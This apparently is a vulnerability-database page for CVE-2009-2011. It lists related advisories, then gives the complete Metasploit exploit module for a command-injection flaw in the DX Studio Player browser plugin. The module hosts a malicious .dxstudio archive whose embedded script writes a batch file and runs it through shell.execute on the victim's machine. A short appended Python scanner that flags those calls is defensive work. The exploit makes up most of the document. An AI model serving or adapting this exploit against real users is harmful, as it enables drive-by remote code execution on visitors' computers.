| Title | Published | Views | Reporter |
|---|---|---|---|
| DX Studio Player < 3.0.29.1 Firefox plug-in Command Injection Vuln | 10 Jun 2009 00:00 | – | zdt |
| CVE-2009-2011 | 10 Jun 2009 00:00 | – | circl |
| DX Studio Player Firefox plug-in command injection | 9 Jun 2009 00:00 | – | coresecurity |
| CVE-2009-2011 | 16 Jun 2009 20:26 | – | cve |
| CVE-2009-2011 | 16 Jun 2009 20:26 | – | cvelist |
| Worldweaver DX Studio Player 3.0.29 - 'shell.execute()' Command Execution (Metasploit) | 26 May 2010 00:00 | – | exploitdb |
| Worldweaver DX Studio Player < 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 2009 00:00 | – | exploitdb |
| Worldweaver DX Studio Player 3.0.29.1 Firefox plugin - Command Injection | 10 Jun 2009 00:00 | – | exploitpack |
| CVE-2009-2011 | 16 Jun 2009 21:00 | – | nvd |
| Ubuntu USN-785-1 (ipsec-tools) | 15 Jun 2009 00:00 | – | openvas |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rex/zip'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Worldweaver DX Studio Player shell.execute() Command Execution',
      'Description'    => %q{
          This module exploits a command execution vulnerability within the DX
        Studio Player from Worldweaver for versions 3.0.29 and earlier. The
        player is a browser plugin for IE (ActiveX) and Firefox (dll). When an
        unsuspecting user visits a web page referring to a specially crafted
        .dxstudio document, an attacker can execute arbitrary commands.

        Testing was conducted using plugin version 3.0.29.0 for Firefox 2.0.0.20
        and IE 6 on Windows XP SP3. In IE, the user will be prompted if they
        wish to allow the plug-in to access local files. This prompt appears to
        occur only once per server host.

        NOTE: This exploit uses additionally dangerous script features to write
        to local files!
      },
      'License'        => MSF_LICENSE,
      'Author'         => [ 'jduck' ],
      'References'     =>
        [
          [ 'CVE', '2009-2011' ],
          [ 'BID', '35273' ],
          [ 'OSVDB', '54969' ],
          [ 'EDB', '8922' ],
          [ 'URL', 'http://dxstudio.com/guide.aspx' ]
        ],
      'Payload'        =>
        {
          'Space' => 2048,
        },
      'Platform'       => 'win',
      # 'Arch'         => ARCH_CMD,
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'CmdStagerFlavor' => 'vbs',
      'DisclosureDate' => '2009-06-09',
      'DefaultTarget'  => 0))
  end

  def on_request_uri(cli, request)
    url_base = "http://"
    url_base += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
    url_base += ":" + datastore['SRVPORT'].to_s + get_resource()
    payload_url = url_base + "/payload"

    # handle request for the payload
    if (request.uri.match(/payload/))

      # build the payload
      return if ((p = regenerate_payload(cli)) == nil)
      cmds = generate_cmdstager({:linemax => 2047}, p)
      scr = ""
      cmds.each { |ln|
        scr << "f.writeString('"
        scr << ln
        scr << "\\n');\n"
      }

      # make header.xml
      hdrxml = %Q|<?xml version="1.0"?>
<dxstudio>
<script><![CDATA[function onInit()
{
var f=system.file.openWrite("BATNAME");
f.writeString('@echo off\\n');
CMDS
f.close();
shell.execute("BATNAME");
}]]>
</script>
</dxstudio>
|
      hdrxml.gsub!(/CMDS/, scr);
      bat_name = rand_text_alphanumeric(rand(32)) + ".bat"
      hdrxml.gsub!(/BATNAME/, bat_name);

      # craft the zip archive
      zip = Rex::Zip::Archive.new
      zip.add_file("header.xml", hdrxml)
      data = zip.pack

      print_status("Sending file.dxstudio payload")
      send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })

      # Handle the payload
      # handler(cli)
      return
    end

    # otherwise, send the html..
    html = %Q|<html>
<body>
<div height=100%>
Please wait...
</div>
<object width=1 height=1 classid='clsid:0AC2706C-8623-46F8-9EDD-8F71A897FDAE'>
<param name="src" value="DXURL" />
<embed width=1 height=1 src=DXURL type="application/x-dxstudio">
</embed>
</object>
</body>
</html>
|

    print_status("Sending #{self.name} HTML")

    # Transmit the compressed response to the client
    html.gsub!(/DXURL/, payload_url)
    send_response(cli, html, { 'Content-Type' => 'text/html' })
  end
end

=begin
TODO:
- make it more quiet
- auto-migrate?
=end
```
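An added detection example, not part of the Metasploit module or the original page: the module serves a ZIP archive whose `header.xml` script calls `system.file.openWrite` and then `shell.execute`, so a download scanner can flag `.dxstudio` files that contain those calls. The function names, the size cap and the sample archives are assumptions constructed for illustration.

```python
import io
import re
import zipfile

# Script calls the module above chains together: write a local file, then run it.
RISKY_CALLS = {
    "shell.execute": re.compile(r"\bshell\s*\.\s*execute\s*\("),
    "system.file.openWrite": re.compile(r"\bsystem\s*\.\s*file\s*\.\s*openWrite\s*\("),
}
MAX_HEADER_BYTES = 1 << 20  # assumed cap; stops an oversized entry exhausting memory


def scan_dxstudio(data: bytes) -> list[str]:
    """Return sorted findings for the bytes of one .dxstudio document."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as archive:
            try:
                info = archive.getinfo("header.xml")
            except KeyError:
                return ["no-header.xml"]
            if info.file_size > MAX_HEADER_BYTES:
                return ["header.xml-too-large"]
            raw = archive.read(info)
    except zipfile.BadZipFile:
        return ["not-a-zip"]  # also covers CRC failures on a tampered entry
    # Scan the text directly rather than parsing XML from an untrusted file.
    text = raw.decode("utf-8", errors="replace")
    return sorted(name for name, rx in RISKY_CALLS.items() if rx.search(text))


def make_sample(script: str, name: str = "header.xml") -> bytes:
    """Build a constructed archive in memory (test data, not a real capture)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr(name, f"<dxstudio><script><![CDATA[{script}]]></script></dxstudio>")
    return buf.getvalue()


# Constructed inputs: one mirrors the write-then-execute pattern, one does not.
FLAGGED = make_sample(
    'function onInit(){var f=system.file.openWrite("x.bat");f.close();shell.execute("x.bat");}'
)
CLEAN = make_sample("function onInit(){ var ready = true; }")

if __name__ == "__main__":
    for label, blob in (("flagged", FLAGGED), ("clean", CLEAN), ("junk", b"junk")):
        print(label, scan_dxstudio(blob))
```

A file that reports both calls matches the write-then-execute pattern used above; either call alone is still worth a manual look.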